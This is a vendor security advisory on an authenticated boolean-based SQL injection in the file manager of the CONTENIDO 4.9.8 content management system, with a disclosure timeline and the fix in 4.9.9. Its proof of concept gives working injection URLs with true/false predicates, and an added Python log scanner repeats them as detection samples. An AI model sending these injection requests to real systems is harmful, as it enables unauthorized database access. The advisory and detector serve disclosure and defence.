Advisory ID: SYSS-2016-013
Product: CONTENIDO
Official Maintainer: four for business AG
Affected Version(s): 4.9.8
Tested Version(s): 4.9.8
Vulnerability Type: SQL Injection (CWE-74)
Risk Level: High
Solution Status: Fixed
Maintainer Notification: 2016-02-18
Solution Date: 2016-02-24
Public Disclosure: 2016-04-18
CVE Reference: Not yet assigned
Author of Advisory: Rainer Boie (SySS GmbH)

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Overview:

CONTENIDO is an open source web content management system developed by four for business AG (see [1]).

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Vulnerability Details:

SySS GmbH found that a logged-on back-end user with access to the file manager can conduct a SQL injection attack due to insufficient input validation.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Proof of Concept (PoC):

Using a fresh installation of CONTENIDO in version 4.9.8, and after creating and logging in as a user with file manager access rights, the following HTTP GET request was used for the SQL injection attack:

http://:/contenido/main.php?area=upl_edit&frame=4&path=&file=example.png*&contenido=egk6j49murlb0iirq0to2fqdqn9c0662

The * marks the insertion point.

The first request results in the details of the requested file:

http://localhost/contenido/main.php?area=upl_edit&frame=4&path=&file=example.png'%20AND%20'A'='A&appendparameters=&startpage=&sortby=&sortmode=&thumbnailmode=&contenido=df7rt3o5rqc5spe4aipue0l9dc21jhp4

The second request results in an error notification:

http://localhost/contenido/main.php?area=upl_edit&frame=4&path=&file=example.png'%20AND%20'A'='B&appendparameters=&startpage=&sortby=&sortmode=&thumbnailmode=&contenido=df7rt3o5rqc5spe4aipue0l9dc21jhp4

Notification:
Could not load file example.png' AND 'A'='B

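As an added example that is not part of the advisory and not CONTENIDO code, the following Python scans web-server access logs for the request shape shown in the PoC above: a `file` parameter sent to `area=upl_edit` that carries a quote followed by AND/OR, and two or more such requests against the same file name, which is the trace a true/false probe like the 'A'='A / 'A'='B pair leaves behind. The log lines, client addresses and the detection heuristic are constructed assumptions.

```python
"""Flag the boolean-based SQL injection probe pattern from SYSS-2016-013 in
web-server access logs (combined log format)."""
import re
from urllib.parse import parse_qs, urlsplit

# Constructed sample log lines; the client IP and session id are placeholders.
SAMPLE_LOG = """\
10.0.0.5 - - [18/Apr/2016:10:00:01 +0200] "GET /contenido/main.php?area=upl_edit&frame=4&path=&file=example.png&contenido=abc HTTP/1.1" 200 5120
10.0.0.5 - - [18/Apr/2016:10:00:07 +0200] "GET /contenido/main.php?area=upl_edit&frame=4&path=&file=example.png'%20AND%20'A'='A&contenido=abc HTTP/1.1" 200 5120
10.0.0.5 - - [18/Apr/2016:10:00:09 +0200] "GET /contenido/main.php?area=upl_edit&frame=4&path=&file=example.png'%20AND%20'A'='B&contenido=abc HTTP/1.1" 200 1873
"""

# Extract the request line: method, target, protocol.
REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')
# A single quote followed by a boolean operator is the injection shape seen in the PoC.
SQLI_RE = re.compile(r"'\s*(AND|OR)\s+", re.IGNORECASE)


def suspicious_file_params(log_text):
    """Return (line_no, decoded `file` value) for requests to the upl_edit area
    whose `file` parameter contains a quote followed by AND/OR."""
    hits = []
    for line_no, line in enumerate(log_text.splitlines(), 1):
        m = REQUEST_RE.search(line)
        if not m:
            continue
        # parse_qs percent-decodes, so %20 becomes a space here.
        qs = parse_qs(urlsplit(m.group("target")).query, keep_blank_values=True)
        if qs.get("area") != ["upl_edit"]:
            continue
        for value in qs.get("file", []):
            if SQLI_RE.search(value):
                hits.append((line_no, value))
    return hits


def blind_probe_bases(hits):
    """Group hits by the file name before the injected quote; two or more
    distinct predicates against one base name indicate a true/false probe."""
    predicates_by_base = {}
    for _, value in hits:
        base, _, predicate = value.partition("'")
        predicates_by_base.setdefault(base, set()).add(predicate.strip())
    return sorted(b for b, preds in predicates_by_base.items() if len(preds) >= 2)


if __name__ == "__main__":
    found = suspicious_file_params(SAMPLE_LOG)
    for line_no, value in found:
        print(f"line {line_no}: file={value!r}")
    print("probed files:", blind_probe_bases(found))
```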
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Solution:

This issue was fixed in version 4.9.9.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Disclosure Timeline:

2016-02-18: Vulnerability reported to four for business AG
2016-02-24: Maintainer four for business AG released security fix version 4.9.9
2016-04-18: SySS discloses the vulnerability

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

References:

[1] Product Web site for CONTENIDO
    http://www.contenido.org
[2] SySS Security Advisory SYSS-2016-013
    https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2016-013.txt
[3] SySS Responsible Disclosure Policy
    https://www.syss.de/en/news/responsible-disclosure-policy/

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Credits:

This security vulnerability was found by Rainer Boie of SySS GmbH.

E-Mail: rainer.boie (at) syss.de
Public Key: https://www.syss.de/fileadmin/dokumente/Materialien/PGPKeys/Rainer_Boie.asc
Key fingerprint = E724 9ECC 7E6F 1008 16AB 1A53 5C12 823D 608D 7AE9

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Disclaimer:

The information provided in this security advisory is provided "as is" and without warranty of any kind. Details of this security advisory may be updated in order to provide as accurate information as possible. The latest version of this security advisory is available on the SySS Web site.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Copyright:

Creative Commons - Attribution (by) - Version 3.0
URL: http://creativecommons.org/licenses/by/3.0/deed.en